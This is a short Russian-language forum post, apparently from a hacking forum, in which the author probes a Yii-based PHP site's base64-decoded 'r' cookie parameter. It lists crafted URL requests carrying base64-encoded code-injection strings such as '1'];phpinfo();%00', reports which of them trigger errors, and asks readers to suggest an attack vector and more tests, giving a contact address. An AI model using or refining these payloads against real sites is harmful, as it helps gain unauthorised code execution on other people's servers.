Нашел вот такую ошибку...
site.com?r=MQ== - отработало ок.
site.com?r[]=MQ== - дает ошибку
expects parameter 1 to be string, array given
это понятно, частая баг, но интересно следующее:
смотрим код, тут есть такая штука
Код:
public function SetCookie($refID)
{
$cookies = Yii::$app->response->cookies;
$cookies->add(new Cookie([
'name' => 'ref',
'value' => base64_decode($refID),
'domain' => $_SERVER['SERVER_NAME'],
'expire' => time() + 3600,
]));
}
как видно параметр декодится BASE64.
далее эксперименты:
site.com?r["1"]=MQ== - дает ошибку
а вот site.com?r["MQ=="]=MQ== - отрабатывает.
тут MQ== это 1 в base64
вообщем параметры в ["ТУТ"] в base64 отрабатываю.
идем далее - эксперименты;
запросы
без вывода ошибки:
site.com?r["MSddOyUwMA=="]=MQ==
MSddOyUwMA== это 1'];%00
site.com?r["MSddO3BocGluZm8oKTslMDA="]=MQ==
MSddO3BocGluZm8oKTslMDA= это 1'];phpinfo();%00
без ошибки исполнено, но и phpinfo не вывело
а запрос
site.com?r["MSddO3BocGluZm8oKTt9JTAw"]=MQ==
MSddO3BocGluZm8oKTt9JTAw это 1'];phpinfo();}%00
дает ошибку.
Итак вопрос, какой бы вы посоветовали вектор атаки, какие еще можно провести тесты?
orlando@jabb.im - жаба для связи